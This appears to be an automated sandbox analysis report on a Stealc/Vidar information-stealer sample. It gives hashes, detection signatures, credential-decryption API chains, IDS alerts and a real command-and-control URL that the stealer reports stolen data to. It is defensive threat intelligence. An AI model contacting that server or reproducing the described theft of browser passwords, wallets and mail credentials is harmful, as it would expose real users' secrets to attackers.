Windows Analysis Report
T220UXIoKO.exe

Overview

General Information

Sample name: T220UXIoKO.exe
renamed because original name is a hash value
Original sample name: ae4d9a7e7f5a086b46b05f5949fc1c78.exe
Analysis ID: 1541124
MD5: ae4d9a7e7f5a086b46b05f5949fc1c78
SHA1: aad8e86e05fe87ea59267d9fc99687de1ebd0cbe
SHA256: 2eb45489a3253bd7ea77a5dc899e86a857fd8dab45dd89de0837289d6ffc5c05
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: T220UXIoKO.exe Avira: detected
Found malware configuration
Source: 00000000.00000003.1682295630.0000000000880000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
Source: 00000000.00000003.1682295630.0000000000880000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\JDAKJDAAFB.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: T220UXIoKO.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409B60
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 0_2_0040C820
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407240
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409AC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418EA0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C6D6C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Unpacked PE file: 0.2.T220UXIoKO.exe.400000.1.unpack
Uses 32bit PE files
Source: T220UXIoKO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 185.98.131.200:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: T220UXIoKO.exe, 00000000.00000002.2955692333.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: T220UXIoKO.exe, 00000000.00000002.2955692333.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00414910
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040DA80
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E430
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BE70
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004016D0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00413EA0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F6B0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004138B0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00414570
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040ED20
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DE10
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 109.107.157.208:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 109.107.157.208:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 109.107.157.208:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 109.107.157.208:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 109.107.157.208:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 109.107.157.208:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49730 -> 109.107.157.208:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://109.107.157.208/49aaa1bd4c594849.php
Source: Malware configuration extractor URLs: http://109.107.157.208/49aaa1bd4c594849.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 